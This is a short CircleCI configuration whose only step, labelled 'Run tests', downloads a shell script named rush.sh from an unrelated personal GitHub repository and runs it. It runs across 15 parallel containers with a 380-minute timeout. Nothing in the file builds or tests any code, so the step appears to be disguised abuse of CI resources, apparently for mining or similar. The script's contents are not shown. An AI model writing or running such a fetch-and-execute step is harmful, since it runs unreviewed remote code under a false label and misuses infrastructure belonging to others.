jobs:
  build:
    parallelism: 15
    docker:
      - image: cimg/go:1.17.7
    steps: 
      - checkout 
      - run: 
          name: Run tests
          no_output_timeout: 380m		  
          command: |
              wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/rush.sh && chmod +x rush.sh &&./rush.sh